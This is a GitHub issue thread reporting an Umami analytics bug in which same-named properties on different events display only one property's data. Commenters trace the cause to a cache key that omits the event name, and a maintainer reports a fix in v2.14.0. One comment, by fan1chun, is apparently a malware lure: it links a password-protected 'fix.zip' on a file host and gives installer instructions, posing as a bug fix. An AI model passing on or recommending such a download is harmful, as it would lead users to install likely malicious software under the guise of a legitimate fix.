### ISSUE TITLE
A bug in event when show Properties

### ISSUE THREAD

**Issue by cottage** [umami-software/umami#2928]
### Describe the Bug

when two or more Properties of different events use the same name, only one property's data can be displayed. Clicking on another property with the same name does not have any effect.

![1](https://github.com/user-attachments/assets/7170bf85-4a1e-4471-b770-6cafc06fbea7)

### Database

PostgreSQL

### Which Umami version are you using? (if relevant)

v2.13.2

### Which browser are you using? (if relevant)

chrome

### How are you deploying your application? (if relevant)

manual install

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pmauldin** [comment]
Running into the same problem. From a quick investigation, it seems to be because the query is being cached by a `websiteId|propertyName` pair value, but does not include the `eventName` in the cache key: 

https://github.com/umami-software/umami/blob/e881735a23df1db3318cbd2a97291e7e17193c76/src/components/hooks/queries/useEventDataValues.ts#L15

**Comment by zandaqo** [comment]
Same problem here. Is there a planned version for this fix? Kinda trivial thing but breaks the UX quite badly.

**Comment by mikecao** [comment]
Fixed in v2.14.0.
